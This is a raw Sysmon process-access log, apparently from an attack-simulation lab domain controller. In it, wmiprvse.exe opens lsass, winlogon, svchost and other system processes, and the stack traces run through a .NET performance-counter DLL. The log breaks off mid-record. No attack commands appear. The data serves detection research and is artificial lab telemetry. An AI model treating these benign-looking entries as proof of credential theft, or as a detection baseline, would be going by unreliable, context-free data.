13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.141{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll